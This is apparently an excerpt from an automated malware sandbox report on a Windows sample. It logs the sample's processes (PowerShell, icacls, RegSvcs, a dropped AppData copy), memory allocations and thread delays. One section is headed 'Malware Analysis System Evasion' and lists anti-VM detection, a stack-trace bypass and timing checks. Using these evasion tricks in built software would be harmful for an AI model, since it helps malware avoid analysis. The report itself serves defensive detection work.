Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: fHkdf4WB7zhMcqP.exe PID: 6904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vssfbkdOErXuYi.exe PID: 7340, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\icacls.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\icacls.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\icacls.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\icacls.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\icacls.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\icacls.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\icacls.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\icacls.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Memory allocated: 2990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Memory allocated: 2990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Memory allocated: 4990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Memory allocated: 7970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Memory allocated: 8970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Memory allocated: 8B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Memory allocated: 9B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Memory allocated: 1070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Memory allocated: 2D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Memory allocated: 2A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Memory allocated: 7580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Memory allocated: 8580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Memory allocated: 8710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Memory allocated: 9710000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_017F096E rdtsc

8_2_017F096E

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3119	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3566	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Window / User API: threadDelayed 9835	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\icacls.exe	API coverage: 2.6 %

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe TID: 1312	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7296	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7356	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7328	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe TID: 7512	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe TID: 7884	Thread sleep count: 138 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe TID: 7884	Thread sleep time: -276000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe TID: 7884	Thread sleep count: 9835 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe TID: 7884	Thread sleep time: -19670000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe TID: 7900	Thread sleep time: -85000s >= -30000s
